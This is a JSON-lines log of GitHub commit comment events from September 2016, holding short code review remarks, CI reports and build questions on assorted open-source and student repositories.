{"id":"4531005057","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18937864,"position":null,"line":null,"path":null,"commit_id":"dcd8adbf343727cd5a8c5576962b37709c3ccfb9","created_at":"2016-09-07T23:57:25Z","updated_at":"2016-09-07T23:57:25Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/37/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:174:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:222:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:303:1: C901 'decode' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-07T23:57:25Z"}
{"id":"4531005186","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18937865,"position":null,"line":null,"path":null,"commit_id":"2551ec0d4c2b39a33dbcf52c4729c1f83bb69311","created_at":"2016-09-07T23:57:27Z","updated_at":"2016-09-07T23:57:27Z","body":"Added for Visual Studio 2005 `nmake` based builds."}},"created_at":"2016-09-07T23:57:27Z"}
{"id":"4531005930","type":"CommitCommentEvent","actor":{"login":"dchiu911"},"repo":{"name":"OVCARE/nanostringr"},"payload":{"comment":{"id":18937869,"position":33,"line":22,"path":"R/HKnorm.R","commit_id":"bf9eed63f53d431b7f482686bd9210708a86fb15","created_at":"2016-09-07T23:57:40Z","updated_at":"2016-09-07T23:57:40Z","body":"Thanks that makes sense to me now, I'll update the documentation. At first I thought `is.logged = TRUE` means the case \"to log\". But the parameter is actually suitably named as it refers to whether the data was *already* logged."}},"created_at":"2016-09-07T23:57:40Z"}
{"id":"4531006349","type":"CommitCommentEvent","actor":{"login":"Lavoaster"},"repo":{"name":"Poniverse/PonyExpo"},"payload":{"comment":{"id":18937870,"position":null,"line":null,"path":null,"commit_id":"bf249482b6b57b1ebc801932baa1a86973ed6074","created_at":"2016-09-07T23:57:49Z","updated_at":"2016-09-07T23:57:49Z","body":"Nah man. "}},"created_at":"2016-09-07T23:57:49Z"}
{"id":"4531008701","type":"CommitCommentEvent","actor":{"login":"MrUpyachka"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18937877,"position":122,"line":152,"path":"HarvestMap/HarvestMap.lua","commit_id":"3502aa1ec8b8edd109431db11b437d4390896365","created_at":"2016-09-07T23:58:31Z","updated_at":"2016-09-07T23:58:31Z","body":"\"Events\" and again, Events name may be already occupied by another script. Better to have prifixes for global names."}},"created_at":"2016-09-07T23:58:31Z"}
{"id":"4525149865","type":"CommitCommentEvent","actor":{"login":"anubes"},"repo":{"name":"nolanlawson/pouchdb-adapter-cordova-sqlite"},"payload":{"comment":{"id":18922391,"position":7,"line":28,"path":"README.md","commit_id":"ea4f9012ae1cf250820fca70a54fae3e173d88cc","created_at":"2016-09-07T03:00:14Z","updated_at":"2016-09-07T03:00:14Z","body":"Hope it works"}},"created_at":"2016-09-07T03:00:14Z"}
{"id":"4525151258","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/responsive_relaxr"},"payload":{"comment":{"id":18922395,"position":5,"line":5,"path":"starter_code/css/responsive.css","commit_id":"fc602ee58f1f62d871ef4e64c11977c37ae5b028","created_at":"2016-09-07T03:00:40Z","updated_at":"2016-09-07T03:00:40Z","body":"This eventually breaks down when the screen becomes very narrow. This element should not have left margin and should be floated to the right. "}},"created_at":"2016-09-07T03:00:40Z"}
{"id":"4525152630","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/responsive_relaxr"},"payload":{"comment":{"id":18922400,"position":24,"line":24,"path":"starter_code/css/responsive.css","commit_id":"fc602ee58f1f62d871ef4e64c11977c37ae5b028","created_at":"2016-09-07T03:01:07Z","updated_at":"2016-09-07T03:01:07Z","body":"Why is max-width set?"}},"created_at":"2016-09-07T03:01:07Z"}
{"id":"4525152681","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922401,"position":676,"line":555,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T03:01:08Z","updated_at":"2016-09-07T03:01:08Z","body":"Is there any particular reason to have a pointer instead of a reference here?"}},"created_at":"2016-09-07T03:01:08Z"}
{"id":"4525153538","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/responsive_relaxr"},"payload":{"comment":{"id":18922402,"position":27,"line":27,"path":"starter_code/css/responsive.css","commit_id":"fc602ee58f1f62d871ef4e64c11977c37ae5b028","created_at":"2016-09-07T03:01:27Z","updated_at":"2016-09-07T03:01:27Z","body":"There's no need to set width: 100% since this is a block level element. "}},"created_at":"2016-09-07T03:01:27Z"}
{"id":"4525156866","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/responsive_relaxr"},"payload":{"comment":{"id":18922409,"position":75,"line":75,"path":"starter_code/css/responsive.css","commit_id":"fc602ee58f1f62d871ef4e64c11977c37ae5b028","created_at":"2016-09-07T03:02:48Z","updated_at":"2016-09-07T03:02:48Z","body":"Try not to use negative margins. "}},"created_at":"2016-09-07T03:02:48Z"}
{"id":"4525157223","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/responsive_relaxr"},"payload":{"comment":{"id":18922412,"position":73,"line":73,"path":"starter_code/css/responsive.css","commit_id":"fc602ee58f1f62d871ef4e64c11977c37ae5b028","created_at":"2016-09-07T03:02:57Z","updated_at":"2016-09-07T03:02:57Z","body":"should be in ems"}},"created_at":"2016-09-07T03:02:57Z"}
{"id":"4525157811","type":"CommitCommentEvent","actor":{"login":"lucasdavidferrero"},"repo":{"name":"lucasdavidferrero/cortada_project"},"payload":{"comment":{"id":18922414,"position":null,"line":null,"path":null,"commit_id":"59d23e19e84f5512349f596a928bea2fa8ea43d4","created_at":"2016-09-07T03:03:12Z","updated_at":"2016-09-07T03:03:12Z","body":"también cambio el modelo edmx con sus ids"}},"created_at":"2016-09-07T03:03:12Z"}
{"id":"4525159900","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922417,"position":706,"line":578,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T03:04:00Z","updated_at":"2016-09-07T03:04:00Z","body":"I wonder if we should put an explanation in these strings, like \"preference value^yes\"."}},"created_at":"2016-09-07T03:04:00Z"}
{"id":"4525160535","type":"CommitCommentEvent","actor":{"login":"smarthi"},"repo":{"name":"apache/incubator-pirk"},"payload":{"comment":{"id":18922420,"position":5,"line":154,"path":"src/test/java/org/apache/pirk/general/PartitionUtilsTest.java","commit_id":"c7fc6ec8719e7b1df5ff3f3baa8bab17643a8454","created_at":"2016-09-07T03:04:15Z","updated_at":"2016-09-07T03:04:15Z","body":"Change this to Short.parseShort(\"2456\") instead ?"}},"created_at":"2016-09-07T03:04:15Z"}
{"id":"4525160942","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/responsive_relaxr"},"payload":{"comment":{"id":18922423,"position":null,"line":null,"path":null,"commit_id":"fc602ee58f1f62d871ef4e64c11977c37ae5b028","created_at":"2016-09-07T03:04:24Z","updated_at":"2016-09-07T03:04:24Z","body":"Good work. This could use a lot of polish, but it fulfills the requirements of the assignment. Please submit your js plan for your final project as soon as you can. "}},"created_at":"2016-09-07T03:04:24Z"}
{"id":"4525162050","type":"CommitCommentEvent","actor":{"login":"victorgama"},"repo":{"name":"d3estudio/zag-app-web"},"payload":{"comment":{"id":18922425,"position":5,"line":5,"path":"tools/deploy.sh","commit_id":"dda2405c40adf3646c9dd073b88eb7f6f966daef","created_at":"2016-09-07T03:04:49Z","updated_at":"2016-09-07T03:04:49Z","body":"Exposing this was not quite a good idea, since we were holding that address behind CloudFlare. 😣 "}},"created_at":"2016-09-07T03:04:49Z"}
{"id":"4525163401","type":"CommitCommentEvent","actor":{"login":"beremanher22"},"repo":{"name":"beremanher22/Prueba"},"payload":{"comment":{"id":18922430,"position":6,"line":6,"path":".gitattributes","commit_id":"7b0ae3eeeff8d6eecc5471f85b87ad1c53404691","created_at":"2016-09-07T03:05:20Z","updated_at":"2016-09-07T03:05:20Z","body":"<h3>Hola soy Berelda Manjarres<h3>"}},"created_at":"2016-09-07T03:05:20Z"}
{"id":"4525163468","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922431,"position":809,"line":791,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T03:05:21Z","updated_at":"2016-09-07T03:05:21Z","body":"We should really un-hard-code this... :|"}},"created_at":"2016-09-07T03:05:21Z"}
{"id":"4525163674","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18922432,"position":null,"line":null,"path":null,"commit_id":"4e5ce632abc3fb503300b685ff24868852ad9781","created_at":"2016-09-07T03:05:26Z","updated_at":"2016-09-07T03:05:26Z","body":"Yah, is that what made it output \"AAAAAAAAAAAAA\""}},"created_at":"2016-09-07T03:05:26Z"}
{"id":"4525165365","type":"CommitCommentEvent","actor":{"login":"smd686s"},"repo":{"name":"google/material-design-lite"},"payload":{"comment":{"id":18922435,"position":null,"line":null,"path":null,"commit_id":"4944037bcd7099521687b6148a85594a57926e0f","created_at":"2016-09-07T03:06:05Z","updated_at":"2016-09-07T03:06:05Z","body":"This commit seems to have dropped the line-height a bit too far on desktop renders:\r\n\r\n![mdl-drawer-line-height](https://cloud.githubusercontent.com/assets/273810/18298409/0be87840-747e-11e6-81e2-228d04451f23.jpg)\r\n\r\nSee https://getmdl.io/templates/android-dot-com/index.html for example."}},"created_at":"2016-09-07T03:06:05Z"}
{"id":"4525165810","type":"CommitCommentEvent","actor":{"login":"Vultraz"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922438,"position":809,"line":791,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T03:06:18Z","updated_at":"2016-09-07T03:06:18Z","body":"Well you're working on the hotkeys, you add an icon field :|"}},"created_at":"2016-09-07T03:06:18Z"}
{"id":"4525166604","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18922439,"position":null,"line":null,"path":null,"commit_id":"4e5ce632abc3fb503300b685ff24868852ad9781","created_at":"2016-09-07T03:06:37Z","updated_at":"2016-09-07T03:06:37Z","body":"Nvm"}},"created_at":"2016-09-07T03:06:37Z"}
{"id":"4525166687","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922440,"position":871,"line":945,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T03:06:39Z","updated_at":"2016-09-07T03:06:39Z","body":"Typo! :("}},"created_at":"2016-09-07T03:06:39Z"}
{"id":"4525167844","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18922441,"position":null,"line":null,"path":null,"commit_id":"4e5ce632abc3fb503300b685ff24868852ad9781","created_at":"2016-09-07T03:07:04Z","updated_at":"2016-09-07T03:07:04Z","body":"That is another bug that can be easily fixed. I am on mobile, so I can't fix right now. I will fix it tomorrow. "}},"created_at":"2016-09-07T03:07:04Z"}
{"id":"4525169291","type":"CommitCommentEvent","actor":{"login":"mrclay"},"repo":{"name":"Elgg/elgg-scripts"},"payload":{"comment":{"id":18922443,"position":null,"line":null,"path":null,"commit_id":"16e4af1c86055b4e62797cc913e6e713f7784b23","created_at":"2016-09-07T03:07:35Z","updated_at":"2016-09-07T03:07:35Z","body":"```\r\nssh elgg.org\r\nsudo su root\r\ncd /root/elgg-scripts\r\ngit pull\r\n```"}},"created_at":"2016-09-07T03:07:35Z"}
{"id":"4525169619","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922445,"position":875,"line":949,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T03:07:43Z","updated_at":"2016-09-07T03:07:43Z","body":"This comment seems pointless. >_>"}},"created_at":"2016-09-07T03:07:43Z"}
{"id":"4525170532","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922449,"position":877,"line":951,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T03:08:07Z","updated_at":"2016-09-07T03:08:07Z","body":"Honestly, I don't see why we can't just use it even if it looks a bit bad."}},"created_at":"2016-09-07T03:08:07Z"}
{"id":"4525171470","type":"CommitCommentEvent","actor":{"login":"ziinee"},"repo":{"name":"ziinee/react-app-boilerplate"},"payload":{"comment":{"id":18922450,"position":2,"line":2,"path":"app/ContactsApp.js","commit_id":"f27d69a00cc5d25ab4d8537c665c18dabba6e4fb","created_at":"2016-09-07T03:08:28Z","updated_at":"2016-09-07T03:08:28Z","body":"App 에서 render를 사용하므로 삭제"}},"created_at":"2016-09-07T03:08:28Z"}
{"id":"4525171470","type":"CommitCommentEvent","actor":{"login":"ziinee"},"repo":{"name":"ziinee/react-app-boilerplate"},"payload":{"comment":{"id":18922450,"position":2,"line":2,"path":"app/ContactsApp.js","commit_id":"f27d69a00cc5d25ab4d8537c665c18dabba6e4fb","created_at":"2016-09-07T03:08:28Z","updated_at":"2016-09-07T03:08:28Z","body":"App 에서 render를 사용하므로 삭제"}},"created_at":"2016-09-07T03:08:28Z"}
{"id":"4525171848","type":"CommitCommentEvent","actor":{"login":"atamariya"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18922451,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-07T03:08:37Z","updated_at":"2016-09-07T03:08:37Z","body":"`// Default audio transcoding mime type\r\nmatchedMimeType = getFormatConfiguration().match(FormatConfiguration.LPCM, null, null);\r\n\r\nif (matchedMimeType != null) {\r\n\tif (pmsConfiguration.isAudioResample()) {\r\n\t\tif (isTranscodeAudioTo441()) {\r\n\t\t\tmatchedMimeType += \";rate=44100;channels=2\";\r\n\t\t} else {\r\n\t\t\tmatchedMimeType += \";rate=48000;channels=2\";\r\n\t\t}\r\n\t} else if (media != null) {\r\n\t\tAudioProperties audio = media.getFirstAudioTrack().getAudioProperties();\r\n\t\tif (audio.getSampleFrequency() > 0) {\r\n\t\t\tmatchedMimeType += \";rate=\" + Integer.toString(audio.getSampleFrequency());\r\n\t\t}\r\n\t\tif (audio.getNumberOfChannels() > 0) {\r\n\t\t\tmatchedMimeType += \";channels=\" + Integer.toString(audio.getNumberOfChannels());\r\n\t\t}\r\n\t}\r\n}`\r\n\r\nThe isAudioResample is helping only PS3 here as it can only handle either 44.1 or 48kHz. The check should rather say renderer is a PS3. Otherwise, @Nadahar 's changes are a better approach."}},"created_at":"2016-09-07T03:08:37Z"}
{"id":"4525173632","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18922453,"position":null,"line":null,"path":null,"commit_id":"e9249abc83f4b2ba0182ac3150115eccb5873461","created_at":"2016-09-07T03:09:22Z","updated_at":"2016-09-07T03:09:22Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (rraustad) - i386-Windows-7-VisualStudio-12: OK (2328 of 2334 tests passed, 0 test warnings)\n\n * 6 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 6 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.74%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T03:09:22Z"}
{"id":"4525175434","type":"CommitCommentEvent","actor":{"login":"kanijpn"},"repo":{"name":"kanijpn/assessment"},"payload":{"comment":{"id":18922458,"position":null,"line":null,"path":null,"commit_id":"3bb1aa05444321f8cdd19ac4dd49a40b3c40dd98","created_at":"2016-09-07T03:10:05Z","updated_at":"2016-09-07T03:10:05Z","body":"スペース忘れてるし"}},"created_at":"2016-09-07T03:10:05Z"}
{"id":"4525178657","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922462,"position":951,"line":1020,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T03:11:21Z","updated_at":"2016-09-07T03:11:21Z","body":"What's the purpose of this?\r\n"}},"created_at":"2016-09-07T03:11:21Z"}
{"id":"4525179912","type":"CommitCommentEvent","actor":{"login":"sudongdong"},"repo":{"name":"1409A-2/ETE"},"payload":{"comment":{"id":18922464,"position":null,"line":null,"path":null,"commit_id":"7cf97e813e2244d90e76a1623fd3ee7be2643742","created_at":"2016-09-07T03:11:52Z","updated_at":"2016-09-07T03:11:52Z","body":"修改了方法名的下划线"}},"created_at":"2016-09-07T03:11:52Z"}
{"id":"4525180237","type":"CommitCommentEvent","actor":{"login":"Vultraz"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922465,"position":951,"line":1020,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T03:12:01Z","updated_at":"2016-09-07T03:12:01Z","body":"accidental inclusion"}},"created_at":"2016-09-07T03:12:01Z"}
{"id":"4525181090","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922467,"position":1014,"line":1287,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T03:12:22Z","updated_at":"2016-09-07T03:12:22Z","body":"I guess this is automatically managed by the fields now?"}},"created_at":"2016-09-07T03:12:22Z"}
{"id":"4525183583","type":"CommitCommentEvent","actor":{"login":"doughepi"},"repo":{"name":"doughepi/M3"},"payload":{"comment":{"id":18922474,"position":5,"line":109,"path":"src/main/java/doughepi/model/AccountTreeTableView.java","commit_id":"fa58527bbe3a2c509aa8e90cf701c69f1ca10856","created_at":"2016-09-07T03:13:19Z","updated_at":"2016-09-07T03:13:19Z","body":"The 'All Accounts' tree node now shows the total balance for all child accounts."}},"created_at":"2016-09-07T03:13:19Z"}
{"id":"4525184063","type":"CommitCommentEvent","actor":{"login":"horvatm"},"repo":{"name":"phoebe-project/phoebe2"},"payload":{"comment":{"id":18922475,"position":null,"line":null,"path":null,"commit_id":"31e4edcb65dea26c07281fe16fd864a42a1a06f9","created_at":"2016-09-07T03:13:30Z","updated_at":"2016-09-07T03:13:30Z","body":"Closes issue #24."}},"created_at":"2016-09-07T03:13:30Z"}
{"id":"4525184715","type":"CommitCommentEvent","actor":{"login":"PoisonAlien"},"repo":{"name":"PoisonAlien/maftools"},"payload":{"comment":{"id":18922477,"position":5,"line":199,"path":"R/annovarToMaf.R","commit_id":"0641477d8520a1fb0ec56267abe7f84bf04ed664","created_at":"2016-09-07T03:13:45Z","updated_at":"2016-09-07T03:13:45Z","body":"fixes #11 "}},"created_at":"2016-09-07T03:13:45Z"}
{"id":"4525187893","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"hunterdt/FinalProject"},"payload":{"comment":{"id":18922487,"position":5,"line":5,"path":"pseudocode","commit_id":"1af00b8cf71d05f6ce60a4c8041030f9bfeff287","created_at":"2016-09-07T03:15:01Z","updated_at":"2016-09-07T03:15:01Z","body":"it may be worth thinking about how you would handle the mobile nav on an actual mobile device since you can't hover."}},"created_at":"2016-09-07T03:15:01Z"}
{"id":"4525188572","type":"CommitCommentEvent","actor":{"login":"hans2016"},"repo":{"name":"hans2016/click"},"payload":{"comment":{"id":18922488,"position":null,"line":null,"path":null,"commit_id":"a027bbd62c66faeea23431015e2e339fac7b32db","created_at":"2016-09-07T03:15:17Z","updated_at":"2016-09-07T03:15:17Z","body":"love to love"}},"created_at":"2016-09-07T03:15:17Z"}
{"id":"4525189830","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"hunterdt/FinalProject"},"payload":{"comment":{"id":18922490,"position":11,"line":11,"path":"pseudocode","commit_id":"1af00b8cf71d05f6ce60a4c8041030f9bfeff287","created_at":"2016-09-07T03:15:47Z","updated_at":"2016-09-07T03:15:47Z","body":"Same here. It's perfectly possible to implement a method like \"isTouchDevice()\" to make your event handling more nuanced. "}},"created_at":"2016-09-07T03:15:47Z"}
{"id":"4525190565","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"hunterdt/FinalProject"},"payload":{"comment":{"id":18922491,"position":15,"line":15,"path":"pseudocode","commit_id":"1af00b8cf71d05f6ce60a4c8041030f9bfeff287","created_at":"2016-09-07T03:16:08Z","updated_at":"2016-09-07T03:16:08Z","body":"I recommend using an existing library for this functionality. "}},"created_at":"2016-09-07T03:16:08Z"}
{"id":"4525191751","type":"CommitCommentEvent","actor":{"login":"furufumi"},"repo":{"name":"ito-satoshi/ToDoList3"},"payload":{"comment":{"id":18922495,"position":null,"line":null,"path":null,"commit_id":"f3ae0c297f0a945b036d2c838201679d009d206b","created_at":"2016-09-07T03:16:35Z","updated_at":"2016-09-07T03:16:35Z","body":"文字化けします☹"}},"created_at":"2016-09-07T03:16:35Z"}
{"id":"4525192462","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"hunterdt/FinalProject"},"payload":{"comment":{"id":18922499,"position":28,"line":28,"path":"pseudocode","commit_id":"1af00b8cf71d05f6ce60a4c8041030f9bfeff287","created_at":"2016-09-07T03:16:53Z","updated_at":"2016-09-07T03:16:53Z","body":"You can use something called localstorage as a mockup, but you're right. "}},"created_at":"2016-09-07T03:16:53Z"}
{"id":"4525193894","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"hunterdt/FinalProject"},"payload":{"comment":{"id":18922503,"position":34,"line":34,"path":"pseudocode","commit_id":"1af00b8cf71d05f6ce60a4c8041030f9bfeff287","created_at":"2016-09-07T03:17:22Z","updated_at":"2016-09-07T03:17:22Z","body":"Not without a backend, but if you learn a little bit of node.js you can do this in a weekend. "}},"created_at":"2016-09-07T03:17:22Z"}
{"id":"4525194895","type":"CommitCommentEvent","actor":{"login":"Vultraz"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922506,"position":1014,"line":1287,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T03:17:47Z","updated_at":"2016-09-07T03:17:47Z","body":"Yes"}},"created_at":"2016-09-07T03:17:47Z"}
{"id":"4525197356","type":"CommitCommentEvent","actor":{"login":"fsst1998"},"repo":{"name":"ito-satoshi/ToDoList3"},"payload":{"comment":{"id":18922517,"position":null,"line":null,"path":null,"commit_id":"f3ae0c297f0a945b036d2c838201679d009d206b","created_at":"2016-09-07T03:18:39Z","updated_at":"2016-09-07T03:18:39Z","body":"まるで家の畑に咲き誇るかぼちゃの花のような美しさです。88点です\r\n"}},"created_at":"2016-09-07T03:18:39Z"}
{"id":"4525200324","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"hunterdt/FinalProject"},"payload":{"comment":{"id":18922528,"position":null,"line":null,"path":null,"commit_id":"1af00b8cf71d05f6ce60a4c8041030f9bfeff287","created_at":"2016-09-07T03:19:47Z","updated_at":"2016-09-07T03:19:47Z","body":"The featureset you've defined is reasonable for the final project. You should definitely look into node.js when the class is over because you'll be able to implement some of the more advanced features at the bottom of the doc with a reasonable amount of effort. Node.js in Action by Manning is a solid intro to Node and it's getting a second edition this January. "}},"created_at":"2016-09-07T03:19:47Z"}
{"id":"4525203628","type":"CommitCommentEvent","actor":{"login":"fukuda-nanami"},"repo":{"name":"fukuda-nanami/ToDoList"},"payload":{"comment":{"id":18922535,"position":null,"line":null,"path":null,"commit_id":"8f1c843a006bd05abcde19eb0dca41fabb5eb113","created_at":"2016-09-07T03:21:11Z","updated_at":"2016-09-07T03:21:11Z","body":"https://evening-sierra-11577.herokuapp.com/tasks\r\n課題提出します"}},"created_at":"2016-09-07T03:21:11Z"}
{"id":"4525203857","type":"CommitCommentEvent","actor":{"login":"fsst1998"},"repo":{"name":"usui-kazuki/ToDoList"},"payload":{"comment":{"id":18922536,"position":null,"line":null,"path":null,"commit_id":"fc50db0f3b1808c0e1bf47477c8920f2b98f13f7","created_at":"2016-09-07T03:21:16Z","updated_at":"2016-09-07T03:21:16Z","body":"パスワードの暗号化がすごかったです。ぜひご教授願いたいです"}},"created_at":"2016-09-07T03:21:16Z"}
{"id":"4525205107","type":"CommitCommentEvent","actor":{"login":"Wan-YunPeng"},"repo":{"name":"shellphish/shellphish-qemu"},"payload":{"comment":{"id":18922537,"position":null,"line":null,"path":null,"commit_id":"37176a385e62a99c17dd6f83c3b5459d5bee7b71","created_at":"2016-09-07T03:21:47Z","updated_at":"2016-09-07T03:21:47Z","body":"When I use \"pip install -e .\", I get this error, could you please tell why and how to solve it. Thanks a lot.\r\nmake[1]: Entering directory '/vagrant/rex/shellphish-qemu/shellphish-qemu-cgc-base/i386-linux-user'\r\n    make[1]: *** No rule to make target 'clean'。 stop。\r\n    make[1]: Leaving directory '/vagrant/rex/shellphish-qemu/shellphish-qemu-cgc-base/i386-linux-user'\r\n    Makefile:292: recipe for target 'clean' failed\r\n    make: *** [clean] Error 1\r\n    Configuring CGC tracer qemu...\r\n    error: Unable to clean shellphish-qemu-cgc-tracer\r\n"}},"created_at":"2016-09-07T03:21:47Z"}
{"id":"4525207336","type":"CommitCommentEvent","actor":{"login":"user-kuroda"},"repo":{"name":"kato-yutaka/ToDoList"},"payload":{"comment":{"id":18922545,"position":null,"line":null,"path":null,"commit_id":"7294b7ac14261d64de7a9580602a8a1fa5e2c90e","created_at":"2016-09-07T03:22:41Z","updated_at":"2016-09-07T03:22:41Z","body":"ちょいちょい日本語化できてないところがありました。"}},"created_at":"2016-09-07T03:22:41Z"}
{"id":"4525207803","type":"CommitCommentEvent","actor":{"login":"furufumi"},"repo":{"name":"Yoshida-Akiho/ToDoList"},"payload":{"comment":{"id":18922546,"position":null,"line":null,"path":null,"commit_id":"f085a383c59f651f59941197aac23c3b7676ae65","created_at":"2016-09-07T03:22:53Z","updated_at":"2016-09-07T03:22:53Z","body":"![aki](https://cloud.githubusercontent.com/assets/18651978/18298647/343a1bba-74f5-11e6-922f-f4afe526c34b.png)\r\n\r\n背景はわざと？？\r\nトップがかわいいです👍\r\n登録がしやすい👍\r\nパスワードの制限が良い👍"}},"created_at":"2016-09-07T03:22:53Z"}
{"id":"4525208865","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18922548,"position":null,"line":null,"path":null,"commit_id":"1ec84d5270a60bac78581c9c53474483b39f8d0d","created_at":"2016-09-07T03:23:18Z","updated_at":"2016-09-07T03:23:18Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;6RJtiVuK&#x2F;7-ft-006-api-get-the-stream-uri\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [FT-006] API get the stream URI</a>"}},"created_at":"2016-09-07T03:23:18Z"}
{"id":"4525210967","type":"CommitCommentEvent","actor":{"login":"lowks"},"repo":{"name":"censof/ansible-deployment"},"payload":{"comment":{"id":18922560,"position":5,"line":21,"path":"tests/python/verify_image.py","commit_id":"5dee6a5923e862eb90d43afa59e4f9c4c443d602","created_at":"2016-09-07T03:24:07Z","updated_at":"2016-09-07T03:24:07Z","body":"Haha! remove the \"()\"\r\n\r\nso it should be: \r\n\r\n`self.assertIn(greeting.text, u'Hello Implementer')`"}},"created_at":"2016-09-07T03:24:07Z"}
